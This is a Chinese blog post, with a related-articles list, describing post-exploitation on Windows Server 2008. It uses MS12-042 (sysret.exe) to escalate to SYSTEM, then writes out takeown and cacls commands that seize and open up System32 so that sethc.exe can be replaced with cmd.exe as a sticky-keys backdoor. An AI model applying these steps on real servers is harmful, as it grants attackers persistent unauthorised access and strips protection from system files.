大家都知道08权限的系统权限设置很严格,且在2003系统中常用到的溢出工具都失效。面对限制IP连接的情况 我们及时拿到system权限 有账号也上不去 这种情况下只能弄shift后门 或者放大镜了。但08权限 在system权限也操作不了系统文件夹。

先查通过whoami查看下登录帐号权限。通过下图我们看到是普通权限

我用的到时MS12042  这个大家都会用单独讲sysret.exe 拿出了
我们找到w3wp.exe这个PID  然后执行以下命令。

我就就获得想要的权限了

我们看到了当前就已经获得了system权限了。

接下来通过如下命令将来sethc.exe替换为cmd 然后远程服务器 5下Shift调出cmd

可是发现拒绝访问。

出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

takeown /f c:\windows\system32\*.* /a /r /d y
1
takeown /f c:\windows\system32\*.*   /a /r /d y

然后在执行

cacls c:\windows\system32\*.* /T /E /G administrators:F
1
cacls  c:\windows\system32\*.*  /T /E /G administrators:F

目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
然后系统文件夹权限

然后即可替换sethc了
可是只有管理员组才能执行权限 但是我们只有system权限 system权限依然不能操作 系统文件夹
我们将命令该成

cacls c:\windows\system32\*.* /T /E /G system:F
1
cacls  c:\windows\system32\*.*  /T /E /G system:F

现在我们就已经成功安装shift后门了

转载于:https://www.cnblogs.com/swyft/p/5491762.html

2008提权之突破系统权限安装shift后门相关推荐

  1. 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...

  2. mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究

    MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...

  3. OSCP-AuthBy(Server 2008提权)

    目录 扫描 FTP WEB 提权 扫描 nmap -sV -sC -p- 192.168.73.46 FTP 检查端口21上的匿名登录 导航到accounts目录,可以观察ftp服务上的帐户 Offs ...

  4. 护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限

    一个dede的站shell,看了下 disable_functions exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod, ...

  5. 【域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞

    文章目录 声明 一.漏洞概述 二.漏洞简介 三.影响范围 四.漏洞原理 五.实战攻击测试 POC/EXP攻击.Impacket工具包 使用 Mimikatz 进行攻击测试 六.恢复用户哈希 恢复域控的 ...

  6. mysql root 提权_mysql以ROOT权限提权方法

    mysql .x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 按照上面的方法,我们需要知道web ...

  7. McAfee Agent漏洞可导致黑客以Windows 系统权限运行代码

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 McAfee Enterprise(现更名为 Trellix)修复了McAfee Agent 软件 Windows 版中的一个漏洞(CVE-20 ...

  8. 系统提权之:Windows 提权

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  9. DAY28:Linux、Windows 系统提权

    DAY28:Linux.Windows 系统提权 1.Linux 系统提权 1.1.Linux 系统版本 linux发行版本: • centos • redhat • ubuntu • kali 1. ...

最新文章

  1. H - Pots POJ - 3414(两个锅互相倒水)
  2. python代码翻译-python实现在线翻译
  3. 打印机乱码不停打印_关于东芝复合机连接打印,图文教你如何轻松连接至电脑...
  4. beetl模板入门例子
  5. C++通过WMI获取硬件配置信息
  6. Linux列出安装过的程序
  7. 一文学会如何做电商数据分析(附运营分析指标框架)
  8. python+OpenCV jpg图片的压缩
  9. 基于Android的简易的二手物品交易app
  10. Layui Table格式化日期(表格)
  11. Linux内核 eBPF基础:perf(2):perf性能管理单元PMU的注册
  12. C++ : Hello, World! (基本输出)
  13. 8个免费在线编程游戏网站,让每个人都可以学习编程
  14. List Set Map
  15. 云米、品钛、趣店等中概股领跌,多家公司股价创历史新低
  16. 腾讯企业邮箱单点登录 php,腾讯企业邮箱集成的坑
  17. linux开机启动动画
  18. dz打不开plugin. php,Discuz!应用中心打不开空白的解决方法
  19. 【机器学习】李宏毅——Flow-based Generative Models
  20. 读《Finger Vein Verification using Intrinsic and Extrinsic Features》

热门文章

  1. 这些机器人决定全球机器人未来趋势·Science Robotics 评选年度十大机器人
  2. 定时爬取下厨房菜谱并邮件发送
  3. 人工智能、机器学习、深度学习、神经网络概念说明
  4. SpringCloud→SpringCloud搭建Zuul动态服务网关(五)
  5. 推荐一个检测 JS 内存泄漏的神器
  6. vue跳转页面及传值
  7. 《LeetCode零基础指南》(第三讲) 一维数组
  8. 高大上的“区块链”离生活有多远?来看国家超算济南中心专家解码!
  9. 怀旧服美服哪个服务器人最多,魔兽世界怀旧服你排队多久 美服平均4小时是什么水平...
  10. mysql服务已经启动但是无法进行连接(can't connect to mysql 1055)